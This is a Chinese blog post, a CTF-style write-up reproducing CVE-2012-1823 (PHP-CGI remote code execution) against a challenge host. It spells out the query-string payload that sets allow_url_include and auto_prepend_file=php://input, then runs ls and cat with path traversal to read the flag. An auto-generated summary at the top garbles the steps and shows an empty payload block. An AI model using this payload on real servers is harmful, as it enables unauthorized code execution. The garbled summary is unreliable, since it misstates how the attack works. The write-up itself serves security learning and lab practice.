漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)

cve,php,cgi · 浏览次数 : 0

小编点评

标题:使用CGI模式进行PHP漏洞挖掘与利用 一、引言 本篇博客将介绍如何使用CGI模式进行PHP漏洞挖掘与利用。我们将通过以下几个步骤来进行演示: 1. 使用-dirsearch工具进行目录扫描 2. 使用-b命令启用FastCGI进程 3. 使用-d选项指定配置项进行漏洞利用 4. 直接访问info.php文件获取PHP版本信息 5. 使用burp抓包工具进行观察 6. 利用得到的信息进行漏洞利用 二、使用-dirsearch工具进行目录扫描 首先,我们需要使用-dirsearch工具对目标网站进行目录扫描。在终端中输入以下命令: ``` dirsearch -u http://47.96.234.169:32349/ ``` 这将扫描目标网站的目录结构,并列出所有可访问的文件。在本例中,我们发现了`info.php`文件。 三、使用-b命令启用FastCGI进程 接下来,我们需要启用FastCGI进程以便于处理PHP请求。在终端中输入以下命令: ``` -b ``` 四、使用-d选项指定配置项进行漏洞利用 现在,我们可以使用-d选项来指定配置项进行漏洞利用。在本例中,我们将启用`allow_url_include`和`auto_prepend_file`选项。以下是具体的命令: ``` -d +allow_url_include+ -d +auto_prepend_file+ php://input ``` 这将允许URL包含和自动预处理文件。接下来,我们将使用POST请求发送一些数据,以便于观察回显。 五、直接访问info.php文件获取PHP版本信息 在完成上述操作后,我们可以直接访问`info.php`文件以获取PHP版本信息。在浏览器中输入以下地址: ``` http://47.96.234.169:32349/info.php ``` 在打开的页面中,我们可以看到PHP的版本信息为5.4.1。此外,页面还显示了一个CVE字样,表示这是一个已知的漏洞。 六、使用burp抓包工具进行观察 为了更好地观察回显,我们可以使用burp抓包工具。首先,启动burp代理并捕获目标网站的HTTP请求。然后,在burp中添加一个新的HTTP请求,将请求头中的`User-Agent`设置为`Mozilla/5.0`,并将请求体设置为我们的攻击载荷。最后,在burp中查看回显,我们可以看到服务器返回了我们的攻击载荷和服务器的响应。 七、利用得到的信息进行漏洞利用 根据之前的观察和分析,我们可以确定漏洞存在于`allow_url_include`选项中。因此,我们可以尝试利用这个漏洞来执行任意代码。具体来说,我们可以将攻击载荷修改为以下内容: ``` ``` 这将使系统执行`ls`命令并列出根目录下的所有文件。在burp中发送这个攻击载荷,我们将看到根目录下的所有文件列表。 八、归纳总结 通过本篇博客的介绍,我们可以了解到如何使用CGI模式进行PHP漏洞挖掘与利用。通过使用-dirsearch工具进行目录扫描、启用FastCGI进程、指定配置项进行漏洞利用以及使用burp抓包工具进行观察等步骤,我们可以成功地利用已知漏洞来执行任意代码。在实际攻击中,我们需要根据目标网站的具体情况进行相应的漏洞利用和攻击。

正文

关于CGI知识点
CGI模式下的参数:

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

题目如下图,没有什么发现

目录扫描一下

dirsearch -u http://47.96.234.169:32349/

发现info.php,直接访问/info.php

可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823
参考博客[https://blog.csdn.net/qq_36374896/article/details/84102239?spm=1001.2014.3001.5506]
然后我们使用burp抓包,便于观察回显

  1. 首先我们使用-s命令查看一下源代码

    可以准确得到源码<?php phpinfo();
  2. 接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input #payload

#post请求内容


可以看到当前用户的名称为“www-data”
3. 然后我们使用ls命令列一下目录

得到index.php和info.php,使用cat命令查看一下index.php

提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下

ls ../../../

发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}
cat ../../../flag

与漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)相似的内容:

漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)

关于CGI知识点 CGI模式下的参数: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 题目如下图,没有什么发现 目录扫描一下 dirsearch -u http:

Windows CSC提权漏洞复现(CVE-2024-26229)

漏洞信息 Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统

HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)

# HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞) @[TOC](目录标题) ### 漏洞概述 ### http.sys介绍 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务

[转帖]CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现

漏洞复现 Timeline Sec 2020-09-29 9,863 关注我们,一起学安全!本文作者:TeddyGrey@Timeline Sec本文字数:1197阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介 F5 BIGIP 链路控制器用于最大限度提升链路性能与可用性的

Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)

Redis未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543) 环境复现 采用Vulfocus靶场进行环境复现,官网docker搭建有问题,具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败 CNV

Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)

Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938) 复现环境 采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。 CVE-2017-12615 文件上传 漏洞简

Apache(2.4.49 2.4.50)--目录遍历--命令执行--(CVE-2021-42013)&&(CVE-2021-41773)

Apache(2.4.49 2.4.50)--目录遍历--命令执行--(CVE-2021-42013)&&(CVE-2021-41773) 复现环境 采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。 漏洞简介 Ap

【0day漏洞复现】北京慧飒科技有限责任公司WEB VIDEO PLATFORM存在未授权访问漏洞

阅读须知 花果山的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于

软件质量问题造成损失高达 2.4 万亿美元!

业内权威机构 Synopsys 称,2022 年软件质量问题可能使美国经济损失 2.41 万亿美元。 根据报告调查结果显示,截至 2022 年,薄弱的软件质量造成的问题包括——因现有漏洞造成的网络攻击、涉及软件供应链相关的复杂安全问题,以及快速积累的技术债务日益增长的影响。 该报告强调了软件质量问题

【漏洞分析】Li.Fi攻击事件分析:缺乏关键参数检查的钻石协议

背景信息 2024 年 7 月 16日,Li.Fi 协议遭受黑客攻击,漏洞成因是钻石协议中 diamond 合约新添加的 facet 合约没有对参数进行检查,导致 call 函数任意执行。且 diamond 合约拥有用户的 approve,所以攻击者可以构造恶意参数对用户资金进行转移。 攻击交易ht